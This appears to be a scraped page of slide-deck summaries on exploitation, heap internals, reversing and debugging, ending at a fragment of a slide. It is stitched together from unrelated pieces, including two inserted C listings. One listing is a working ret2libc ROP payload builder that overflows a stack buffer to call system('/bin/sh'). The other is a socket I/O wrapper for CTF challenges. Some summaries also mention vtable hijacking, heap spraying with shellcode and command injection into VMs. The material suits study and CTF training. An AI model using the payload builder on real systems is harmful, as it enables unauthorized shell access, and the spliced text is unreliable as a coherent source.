The document provides an overview of basic penetration testing techniques, including buffer overflow vulnerabilities, return-oriented programming (ROP), format string vulnerabilities, and ways to bypass data execution prevention (DEP) and address space layout randomization (ASLR). It discusses stack-based buffer overflows, the layout of the x86 stack, overwriting the saved return address, and thereby controlling the instruction pointer. It also covers ROP techniques such as ret2libc, gadgets, chaining, and calling libc functions. Finally, it briefly mentions tools like pwntools and ROPgadget, and techniques like I/O wrapping and LD_PRELOAD hijacking.
Introduces Brainf*ck, another Turing-complete programming language, then implements the following from scratch: an interpreter, a compiler [x86_64 and ARM], and a JIT compiler.
Windows 10 Nt Heap Exploitation (English version) - Angel Boy
The document discusses the Windows memory allocator and heap exploitation. It describes the core components and data structures of the NT heap, including the _HEAP structure, _HEAP_ENTRY chunks, BlocksIndex structure, and FreeLists. It also explains the differences between the backend and frontend allocators as well as how chunks of different sizes are managed.
vmlinux: anatomy of bzImage and how the x86_64 processor is booted - Adrian Huang
This slide deck describes the Linux booting flow for x86_64 processors.
Note: When you view the slide deck in a web browser, the screenshots may be blurred. Download the deck and view it offline for clear screenshots.
Play with FILE Structure - Yet Another Binary Exploit Technique - Angel Boy
The document discusses exploiting the FILE structure in C programs. It provides an overview of how file streams and the FILE structure work. Key points include that the FILE structure contains flags, buffers, a file descriptor, and a virtual function table. It describes how functions like fopen, fread, and fwrite interact with the FILE structure. It then discusses potential exploitation techniques like overwriting the virtual function table or FILE's linked list to gain control of program flow. It notes defenses like vtable verification implemented in modern libc libraries.
Build a fully functional virtual machine from scratch, using Brainfuck as the guest language. Covers basic interpreter concepts, optimization techniques, language specialization, and platform-specific tweaks.
This document provides information about the x86 architecture, including registers, flags, modes, common instructions, Intel and AT&T syntax, system calls, examples, and references. It defines the purpose of key registers like EAX, EBX and ESP and of the flags. It explains real mode and protected mode and the differences between Intel and AT&T syntax. Examples demonstrate how to write assembly code and invoke system calls. The references provided can be used to learn more about x86 assembly programming.
The document discusses C++ exploitation techniques including name mangling, virtual function tables, vtable hijacking, vectors, strings, and the memory allocation/deallocation operators new and delete. It details how virtual function tables implement polymorphism in C++ and how vtable hijacking turns a memory corruption bug into code execution: the attacker overwrites an object's vtable pointer so that the next virtual call dispatches through an attacker-controlled table to shellcode. It also explains how vectors and strings are implemented with dynamically allocated storage and describes their memory layout.
Windows 10 Nt Heap Exploitation (Chinese version) - Angel Boy
The document discusses Windows memory allocation and the NT heap. It describes the core data structures used, including the _HEAP, _HEAP_ENTRY chunks, and _HEAP_LIST_LOOKUP BlocksIndex. It explains how allocated, freed, and VirtualAlloc chunks are structured and managed in the Back-End, including using freelist chains and BlocksIndex to efficiently service allocation requests.
The document discusses LR parsing, which is a technique for parsing input strings according to a context-free grammar. It provides examples of parsing the input string "1 + 2 * 3" according to a sample grammar using an LR parsing table. Each step of the parsing is explained, including shifting and reducing grammar rules based on the table entries and the stack contents. The overall process demonstrates how LR parsing uses a parsing table derived from the grammar to iteratively parse the input from left to right.
FISL XIV - The ELF File Format and the Linux Loader - John Tortugo
These are the slides used in a lecture I gave in the XIV International Board on Free Software. In this lecture I gave a brief overview of the ELF specification (the ELF specification is a document describing the format of executable, shared library and relocatable object files used in Linux and many other operating systems) and the Linux dynamic loader (which is a program that acts together with the OS to create and initialize a program address space, among other tasks).
The document discusses the internals of the Windows heap and how it can be exploited for arbitrary memory overwrites. It covers the key data structures used in heap management like segments, free lists, lookaside tables, and virtually allocated chunks. The algorithms for allocation and freeing memory from the heap are explained in detail. Special techniques for reliable heap exploitation are presented for overcoming issues with service pack dependencies and unknown addresses.
This document provides an outline for a Capture the Flag (CTF) event with details on CTF concepts, server setup, and examples of challenges. Some key points:
- It introduces CTFs and the AIS3 final CTF event, which will use a jeopardy style format across categories like Misc, Binary, Pwn, Web, and Crypto.
- It provides instructions for setting up a CTF server on Linux with tricks like disabling stack protectors, allowing code execution in the stack, and disabling address space layout randomization (ASLR) to make challenges simpler.
- It outlines some simple initial challenges like a basic buffer overflow example in C, using cryptography, and two pwn
TDOH Southern Region Workshop 2016: Reversing on Windows - Sheng-Hao Ma
The document discusses various topics related to reversing Windows programs, including:
1) The structure of Windows Portable Executable (PE) files and processes. It covers the import address table, image base, and finding the program entry point.
2) x86 assembly language concepts like opcodes, registers, data types, calling conventions, and function calls.
3) Tools for reversing including IDA Pro, OllyDbg, and Cheat Engine. It provides instructions on using these tools to analyze PE files, disassemble code, and debug processes.
The document discusses domain generation algorithms (DGAs) used in malware command and control networks and how they have evolved over time. It provides examples of specific DGAs like Conficker, Cryptolocker, and Tinba. It also describes how intelligence can be gathered on DGAs by reverse engineering them, monitoring generated domains for resolutions, and tracking associated IP addresses and nameservers. The goal of DGAs from an adversary perspective is to increase the resilience of command and control structures against takedowns.
The document discusses methods for identifying devices on a local area network (LAN). It explains that traditional intrusion detection and prevention systems assumed all LAN devices were PCs, but with the rise of IoT, devices now include appliances, sensors, and more. The document then outlines several passive methods for detecting LAN devices, including checking: (1) the device MAC address' organizationally unique identifier to determine brand, (2) DHCP options like client identifier for fingerprints, (3) HTTP user-agent strings for clues, and (4) common applications used. Identifying LAN devices provides benefits for monitoring, access control, and generating threat intelligence.
This document provides an overview of ransomware, including what it is, how it spreads, examples of ransomware families, and prevention strategies. Ransomware encrypts files on an infected system and demands payment, usually in cryptocurrency, to decrypt the files. It spreads through spam emails containing malicious attachments or links, compromised websites using exploit kits, and by exploiting vulnerabilities in operating systems. The document demonstrates ransomware infections through snapshots and shares folders. Prevention includes regularly backing up important files, avoiding unsolicited documents, and keeping systems updated.
The document provides an introduction to pwn, which refers to fully controlling another person's device by exploiting vulnerabilities. It discusses what pwn is, how to infiltrate systems, common exploitation techniques like buffer overflows, and gives an example lab outline. The key points are that pwn involves using exploits to gain unauthorized access and control of servers by leveraging bugs in binaries or logic flaws. Common vulnerabilities include unfiltered user input, array index errors, and logical flaws.
O'Reilly Velocity New York 2016 presentation on modern Linux tracing tools and technology. Highlights the available tracing data sources on Linux (ftrace, perf_events, BPF) and demonstrates some tools that can be used to obtain traces, including DebugFS, the perf front-end, and most importantly, the BCC/BPF tool collection.
This talk gives a short introduction into buffer overflows, how to exploit them and which counter measures are used in openSUSE Linux to make exploitation harder.
We'll cover stack canaries, fortify source, address space layout randomization and NX. We'll see how they work and how they can be circumvented in a live demo of a working exploit that manages to circumvent these security measures.
That Goes Without Alpha-Num (or Does It?) - all your base10 are belong to us - takesako
The document discusses various programming languages and their characteristics, presented with unconventional formatting that avoids typical alphanumeric characters.
(1) It examines MS-DOS 8086 assembly language programming and describes executing code on 16-bit x86 CPUs through binary instructions.
(2) It also examines JavaScript, Perl and Ruby, and compares some of their common features like comment syntax and string interpolation.
(3) It then proposes executing x86 code without hand-written binaries by manipulating registers through hexadecimal subtraction and bitwise operations, though this method would be difficult to program and debug.
The document discusses exploiting a buffer overflow vulnerability in Internet Explorer's VML implementation (MS06-055) to execute arbitrary code. It describes overwriting the structured exception handler to gain control of the instruction pointer, using heap spraying to load a buffer in memory, and having the instruction pointer jump to the buffer to execute shellcode and spawn a command shell. Metasploit is introduced as an open-source framework for developing exploits.
This document discusses return oriented programming (ROP) as a technique for exploiting buffer overflows. It explains that on x86, the return address is stored on the stack, so by overflowing a buffer an attacker can control program flow. It then describes different ROP techniques like calling library functions or using "gadgets" that end in return to chain together snippets of code to achieve objectives like executing a shell.
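Both this deck and the first one above describe ret2libc chaining in words only. The following is an added example, not code from either deck or their authors, that makes the layout concrete for an x86_64 stack overflow: filler up to the saved return address, an optional lone `ret` to keep the stack 16-byte aligned for `system()`, a `pop rdi; ret` gadget to load the first argument, the address of a `"/bin/sh"` string, and `system()` itself. The offset, gadget addresses and libc addresses are constructed placeholders standing in for values you would recover with a debugger, ROPgadget and a libc leak (or a no-ASLR setup); on 32-bit x86 the argument would instead go on the stack after the return address.

```c
/* Added example (not from the deck): assembling an x86_64 ret2libc ROP chain
 * for a stack buffer overflow. All addresses and the offset are constructed
 * placeholders standing in for values recovered with a debugger, ROPgadget
 * and a libc leak (or a no-ASLR setup). */
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define RET_OFFSET          72U               /* assumed: bytes from buffer start to the saved return address */
#define GADGET_POP_RDI_RET  0x401203ULL       /* assumed: "pop rdi; ret" in the binary, as ROPgadget would list it */
#define GADGET_RET          0x40101aULL       /* assumed: a lone "ret", used to realign the stack */
#define LIBC_SYSTEM         0x7ffff7e12290ULL /* assumed: system() after a libc leak */
#define LIBC_BINSH          0x7ffff7f745bdULL /* assumed: "/bin/sh" string inside libc */

/* Store v as a little-endian 64-bit word at out[off]; returns the next offset. */
static size_t put_u64(unsigned char *out, size_t off, uint64_t v) {
    for (int i = 0; i < 8; i++) out[off + i] = (unsigned char)(v >> (8 * i));
    return off + 8;
}

/* Read back the word at p[off], the way a debugger would display the stack slot. */
uint64_t word_at(const unsigned char *p, size_t off) {
    uint64_t v = 0;
    for (int i = 7; i >= 0; i--) v = (v << 8) | p[off + i];
    return v;
}

/* Stack layout once the vulnerable function returns:
 *   saved RIP -> [ret]            optional: keeps rsp 16-byte aligned for system()'s movaps
 *                pop rdi; ret     gadget: loads the first argument register
 *                &"/bin/sh"       popped into rdi
 *                system           entered with rdi = "/bin/sh"
 * Returns the payload length, or 0 if cap is too small. */
size_t build_ret2libc(unsigned char *out, size_t cap, int align_stack) {
    size_t words = 3 + (align_stack ? 1 : 0);
    if (cap < RET_OFFSET + 8 * words) return 0;
    memset(out, 'A', RET_OFFSET);                 /* filler up to the saved return address */
    size_t off = RET_OFFSET;
    if (align_stack) off = put_u64(out, off, GADGET_RET);
    off = put_u64(out, off, GADGET_POP_RDI_RET);
    off = put_u64(out, off, LIBC_BINSH);
    off = put_u64(out, off, LIBC_SYSTEM);
    return off;
}

/* Index of the first byte the input path would cut the payload at (e.g. '\n'
 * for fgets(), '\0' for strcpy()), or -1 if the chain survives intact. */
long find_bad_byte(const unsigned char *p, size_t n, unsigned char bad) {
    for (size_t i = 0; i < n; i++) if (p[i] == bad) return (long)i;
    return -1;
}

/* Builds the aligned chain and checks every slot; returns 0 when the layout matches the comment above. */
int ret2libc_selftest(void) {
    unsigned char payload[128];
    size_t n = build_ret2libc(payload, sizeof payload, 1);
    if (n != RET_OFFSET + 32) return 1;
    if (payload[0] != 'A' || payload[RET_OFFSET - 1] != 'A') return 2;
    if (word_at(payload, RET_OFFSET)      != GADGET_RET)         return 3;
    if (word_at(payload, RET_OFFSET + 8)  != GADGET_POP_RDI_RET) return 4;
    if (word_at(payload, RET_OFFSET + 16) != LIBC_BINSH)         return 5;
    if (word_at(payload, RET_OFFSET + 24) != LIBC_SYSTEM)        return 6;
    if (find_bad_byte(payload, n, '\n') != -1) return 7;                     /* deliverable through fgets() */
    if (find_bad_byte(payload, n, '\0') != (long)RET_OFFSET + 3) return 8;   /* strcpy() would stop inside the first gadget address */
    return 0;
}
```

The bad-byte check is the part worth keeping in real exploits: the first NUL sits three bytes into the first gadget address, so the same chain that works through `fgets()` or `read()` is truncated by any `strcpy()`-style copy, and a `\n` anywhere in an address breaks `fgets()` delivery.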
Debugging Linux kernel tools and techniques - Satpal Parmar
This document discusses tools and techniques for debugging the Linux kernel, including debuggers like gdb, built-in debugging facilities, system logs, and crash dump analysis tools like LKCD. It outlines common issues like kernel crashes and hangs, and provides an example of analyzing an "oops" crash dump to identify the failing line of code through tools like ksymoops. It also covers generating a full system memory dump using LKCD for thorough crash investigation.
Troubleshooting Linux Kernel Modules And Device Drivers - Satpal Parmar
The document discusses various techniques for debugging Linux kernel modules and device drivers, including:
1) Using printk statements to output debug messages from kernel space.
2) Watching system calls with strace to debug the interaction between user space and the kernel.
3) Adding /proc file system entries, with write handlers, to read and modify driver values at runtime.
4) Enabling source-level debugging of the driver's C code with kgdb or a hardware debugger.
5) Recognizing common failure signatures such as kernel panics and oops messages and what they indicate.
The document discusses exploring the x64 architecture, covering topics such as the x64 application binary interface, memory layout differences between x86 and x64, API hooking and code injection techniques for x64, and differences in system calls between x86 and x64. It provides an overview of key technical details and concepts for developers working with x64 platforms.
Compromising Linux Virtual Machines with Debugging Mechanisms - Russell Sanford
This presentation covers using VMware's GDB debugging stub to invasively inject commands into a Linux x64 target. The kernel API is detected automatically in order to locate _vmalloc and the call_usermodehelper* functions across all 3.x and 4.x kernels.
AddressSanitizer and ThreadSanitizer are tools for finding bugs and vulnerabilities in the Chrome browser and server applications. AddressSanitizer detects buffer overflows and use-after-free errors. ThreadSanitizer detects data races in C++ and Go code. MemorySanitizer detects uninitialized memory reads. The tools use compiler instrumentation and run-time libraries to monitor memory accesses and detect errors. Over 1000 bugs have been found using these tools in Chrome and Google server applications.
An introduction to exploit development.
I gave this talk at Hack the North 2014, and most of this information is pulled out of classics like Smashing the Stack for Fun and Profit, so there shouldn't be anything novel in here.
Performance tweaks and tools for Linux (Joe Damato) - Ontico
The document discusses various Linux performance analysis tools including lsof to list open files, strace to trace system calls, tcpdump to dump network traffic, perftools from Google for profiling CPU usage, and a Ruby library called perftools.rb for profiling Ruby code. Examples are provided for using these tools to analyze memory usage, slow queries, Ruby interpreter signals, thread scheduling overhead, and identifying hot spots in Ruby web applications.
This document provides an overview of Windows user-mode debugging concepts like processes, threads, stack frames, and the WinDbg debugging tool. It discusses how to set up WinDbg and analyze crashes through examples like examining stack frames, debugging a simple crash, and commands commonly used in WinDbg. The document concludes with demonstrating how to analyze an IMA service crash using a memory dump.
Oops! Insecure code: detection, exploitation and mitigation of vulnerabilities... - Software Guru
This document discusses code that is vulnerable to various exploits and summarizes explanations of exploits. It includes code for writing notes to a file that is vulnerable to format string bugs and buffer overflows. It also includes code for searching notes that could be exploited through malformed input to read arbitrary files or crash the program. The document walks through examples of exploiting buffer overflows, format string bugs, and other vulnerabilities.
Finding Xori: Malware Analysis Triage with Automated Disassembly - Priyanka Aash
In a world of high volume malware and limited researchers, we need a dramatic improvement in our ability to process and analyze new and old malware at scale. Unfortunately, what is currently available to the community is incredibly cost prohibitive or does not rise to the challenge. As malware authors and distributors share code and prepackaged tool kits, the white hat community is dominated by solutions aimed at profit as opposed to augmenting capabilities available to the broader community. With that in mind, we are introducing our library for malware disassembly called Xori as an open source project. Xori is focused on helping reverse engineers analyze binaries, optimizing for time and effort spent per sample.
Xori is an automation-ready disassembly and static analysis library that consumes shellcode or PE binaries and provides triage analysis data. This Rust library emulates the stack, register states, and reference tables to identify suspicious functionality for manual analysis. Xori extracts structured data from binaries to use in machine learning and data science pipelines.
We will go over the pain-points of conventional open source disassemblers that Xori solves, examples of identifying suspicious functionality, and some of the interesting things we've done with the library. We invite everyone in the community to use it, help contribute and make it an increasingly valuable tool in this arms race.
110. IO Wrapper
• select() and pselect() allow a program to monitor multiple file descriptors, waiting until one or more of the file descriptors become "ready" for some class of I/O operation (e.g., input possible). A file descriptor is considered ready if it is possible to perform a corresponding I/O operation (e.g., read(2) without blocking, or a sufficiently small write(2)).
http://man7.org/linux/man-pages/man2/select.2.html
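The select() call quoted on this slide is what a CTF-style I/O wrapper is built on: the wrapper accepts a connection, runs the challenge binary with its stdin/stdout on pipes, and has to move bytes in both directions without knowing which side will speak next, so it blocks in select() on the client socket and the child's stdout together. The following is an added example of such a wrapper in C; it is not code from the deck or its author. The listener itself is left out (a server would accept() and hand each connection to run_wrapped() in a forked child), and leaving the target's stderr untouched is an assumption, not something the slide specifies.

```c
/* Added example (not from the deck): a select()-based I/O wrapper that exposes
 * a local challenge binary to a remote client by shuttling bytes between the
 * client's socket and the child's stdin/stdout. */
#include <errno.h>
#include <signal.h>
#include <string.h>
#include <unistd.h>
#include <sys/select.h>
#include <sys/socket.h>
#include <sys/wait.h>

/* Copy one read()'s worth of data from `from` to `to`, finishing short writes.
 * Returns bytes moved, 0 on EOF, -1 on error. */
static ssize_t forward(int from, int to) {
    char buf[4096];
    ssize_t n = read(from, buf, sizeof buf);
    if (n <= 0) return n;
    for (ssize_t off = 0; off < n;) {
        ssize_t w = write(to, buf + off, (size_t)(n - off));
        if (w < 0) { if (errno == EINTR) continue; return -1; }
        off += w;
    }
    return n;
}

/* The select() loop from the slide: watch the client socket and the child's
 * stdout at once, copy whichever becomes readable to the other side, and stop
 * at the first EOF or error. Returns bytes relayed, or -1 if select() fails. */
long relay(int client_fd, int child_in, int child_out) {
    long total = 0;
    int maxfd = client_fd > child_out ? client_fd : child_out;
    for (;;) {
        fd_set rfds;
        FD_ZERO(&rfds);
        FD_SET(client_fd, &rfds);
        FD_SET(child_out, &rfds);
        if (select(maxfd + 1, &rfds, NULL, NULL, NULL) < 0) {
            if (errno == EINTR) continue;
            return -1;
        }
        if (FD_ISSET(client_fd, &rfds)) {            /* client -> child stdin */
            ssize_t n = forward(client_fd, child_in);
            if (n <= 0) return total;
            total += n;
        }
        if (FD_ISSET(child_out, &rfds)) {            /* child stdout -> client */
            ssize_t n = forward(child_out, client_fd);
            if (n <= 0) return total;
            total += n;
        }
    }
}

/* Spawn argv[0] with stdin/stdout on pipes, relay them to client_fd, and kill
 * the child once the client goes away. stderr is left untouched (assumption:
 * the wrapper's own log should keep the target's crash output). */
int run_wrapped(int client_fd, char *const argv[]) {
    int in_pipe[2], out_pipe[2];
    if (pipe(in_pipe) < 0 || pipe(out_pipe) < 0) return -1;
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        dup2(in_pipe[0], STDIN_FILENO);
        dup2(out_pipe[1], STDOUT_FILENO);
        close(in_pipe[0]); close(in_pipe[1]); close(out_pipe[0]); close(out_pipe[1]);
        close(client_fd);
        execv(argv[0], argv);
        _exit(127);
    }
    close(in_pipe[0]); close(out_pipe[1]);
    long moved = relay(client_fd, in_pipe[1], out_pipe[0]);
    close(in_pipe[1]); close(out_pipe[0]);
    kill(pid, SIGKILL);                /* a disconnected client must not leave the target running */
    waitpid(pid, NULL, 0);
    return moved < 0 ? -1 : 0;
}

/* Self-test without a network or a child: a socketpair stands in for the
 * client connection and two pipes for the child's stdin/stdout. Returns 0 when
 * both directions arrive intact and relay() stops on the client's half-close. */
int relay_selftest(void) {
    int sp[2], in_pipe[2], out_pipe[2];
    if (socketpair(AF_UNIX, SOCK_STREAM, 0, sp) < 0) return -1;
    if (pipe(in_pipe) < 0 || pipe(out_pipe) < 0) return -1;
    if (write(sp[1], "ping\n", 5) != 5) return -1;        /* constructed client input */
    shutdown(sp[1], SHUT_WR);                              /* client half-closes: relay() must see EOF */
    if (write(out_pipe[1], "pong\n", 5) != 5) return -1;  /* constructed stand-in for the child's reply */
    long moved = relay(sp[0], in_pipe[1], out_pipe[0]);
    char to_child[16] = {0}, to_client[16] = {0};
    if (read(in_pipe[0], to_child, sizeof to_child - 1) < 0) return -1;
    if (read(sp[1], to_client, sizeof to_client - 1) < 0) return -1;
    return (moved == 10 && strcmp(to_child, "ping\n") == 0 && strcmp(to_client, "pong\n") == 0) ? 0 : 1;
}
```

Two details matter when this fronts an exploitable binary. The relay stops on EOF from either side, so a crash in the target closes its stdout and drops the client promptly, and the SIGKILL after relay() returns stops a shell spawned by a successful exploit from living on once the connection is gone. The self-test uses shutdown(SHUT_WR) rather than close() on the client side because a fully closed peer would make the relay's write back to the client raise SIGPIPE.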